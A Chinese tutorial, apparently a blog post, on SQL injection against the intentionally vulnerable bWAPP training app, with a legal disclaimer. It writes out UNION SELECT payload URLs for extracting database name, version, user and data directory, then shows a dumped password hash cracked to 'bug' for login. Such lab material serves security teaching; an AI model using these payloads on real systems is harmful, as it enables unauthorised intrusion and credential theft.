渗透入门之SQL 注入(二)

重要声明

SQL注入实验仅可在自己搭建的合法测试环境(如本地虚拟机、授权的测试服务器)中进行,严禁对任何非授权系统实施测试,否则可能违反《网络安全法》等法律法规,需承担相应法律责任。

接上一篇渗透入门之SQL 注入(一)

SQL Injection (GET/Select):GET请求数据查询类注入

BWAPP的SQL Injection (GET/Select)漏洞属于下拉选择框驱动的GET参数注入,核心特征是页面通过下拉选单(如选择国家/地区、类别等)提交GET参数(典型参数名:movie),参数通常关联数据库的主键/索引字段,易触发数字型(或字符型)SQL注入。与Search类注入的核心区别:注入点是下拉选单对应的ID类GET参数,而非搜索框的字符串参数,测试逻辑需适配数字型注入特征。

1 步骤1:进入漏洞页面

(2) 步骤2:判断注入点类型及存在性

目标:确认movie参数是否存在注入,以及注入类型(数字型/字符型)。

测试1:数字型注入验证

  • 结论:movie参数存在数字型SQL注入

(3) 步骤3:判断后台查询的字段数(ORDER BY)

目标:确定后台SQL查询的字段数量,为联合查询铺垫。

构造URL(逐步增加ORDER BY后的数字,直到报错):

结论:后台SQL查询的字段数为7。

(4)步骤4:联合查询找"显位"(可显示数据的列)

目标:让原查询无结果,强制显示联合查询的结果,确定哪些列会在页面展示。

  • 构造URL(用movie=-1让原查询无匹配结果,UNION SELECT拼接查询):

http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,2,3,4,5,6,7&action=go;

  • 观察页面:数字2、3、4等会显示在页面中,说明第该列是显位(可展示注入提取的数据)。

(5)步骤5:获取数据库基础信息

利用UNION SELECT提取MySQL核心信息,替换显位为目标函数:

|--------|---------------------------------------------------------------------------------------|--------|
| 目标信息 | 构造URL示例(数字型) | 预期结果示例 |
| 当前数据库名 | http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,database(),3&action=go | bwapp |

|---------|--------------------------------------------------------------------------------------|--------|
| 目标信息 | 构造URL示例(数字型) | 预期结果示例 |
| MySQL版本 | http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,version(),3&action=go | 5.0.96 |

|-------|-----------------------------------------------------------------------------------|------------------------------------------------|
| 目标信息 | 构造URL示例(数字型) | 预期结果示例 |
| 数据库用户 | http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,user(),3&action=go | root@localhost |

|--------|--------------------------------------------------------------------------------------|-----------------|
| 目标信息 | 构造URL示例(数字型) | 预期结果示例 |
| 数据存储目录 | http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,@@datadir,3&action=go | /var/lib/mysql/ |

(6)步骤6:获取 bwapp 数据库的表名

详见渗透入门之SQL注入(一)

(7)步骤7:获取 users 表的列名

详见渗透入门之SQL注入(一)****

(8)步骤8:提取 users 表的账号密码数据

详见****渗透入门之SQL注入(一)********

页面会显示用户数据:

|----------------------|------------------------------------------|
| 显位2(由上章节用户名存在login里) | 显位3(password,MD5加密) |
| A.I.M. | 6885858486f31043e5839c735d99457f045affd0 |

解密MD5值:A.I.M.对应密码bug。

(9)步骤9:验证结果

使用提取到的用户名密码登录BWAPP,验证账号密码的有效性,确认注入结果正确。

相关推荐
Irene1991几秒前
数据库锁机制:表锁、行锁(Oracle 默认)、共享锁、排他锁、乐观锁、悲观锁、死锁、Hive 中的锁
数据库
东风破1371 分钟前
DM达梦数据库安全、审计功能学习记录
数据库·学习·oracle·dm达梦数据库
JAVA学习通7 分钟前
《大营销平台系统设计实现》 - 营销服务 第10节:不超卖库存规则实现
java·数据库·oracle·责任链模式·codex
阿坤带你走近大数据7 分钟前
HiveSQL常见性能调优策略与经验
hive·sql·调优
ZC跨境爬虫16 分钟前
跟着 MDN 学CSS day_7:(层叠优先级与继承)
前端·css·数据库·ui·html
YOU OU21 分钟前
MyBatis 操作数据库(入门)
数据库·mybatis
电商API_1800790524733 分钟前
反向海淘是什么?现状如何?未来趋势如何?
数据库·人工智能·笔记·性能优化·数据挖掘·网络爬虫
MRSM_0133 分钟前
Redis 缓存、队列、排行榜的核心用法
数据库·redis·缓存
唐青枫33 分钟前
别让 NULL 拖垮结果:MySQL COALESCE 空值兜底实战详解
sql·mysql
Trouvaille ~34 分钟前
【Redis篇】Redis 安装与启动:快速搭建一个 Redis 环境
数据库·redis·后端·ubuntu·缓存·环境搭建·安装教程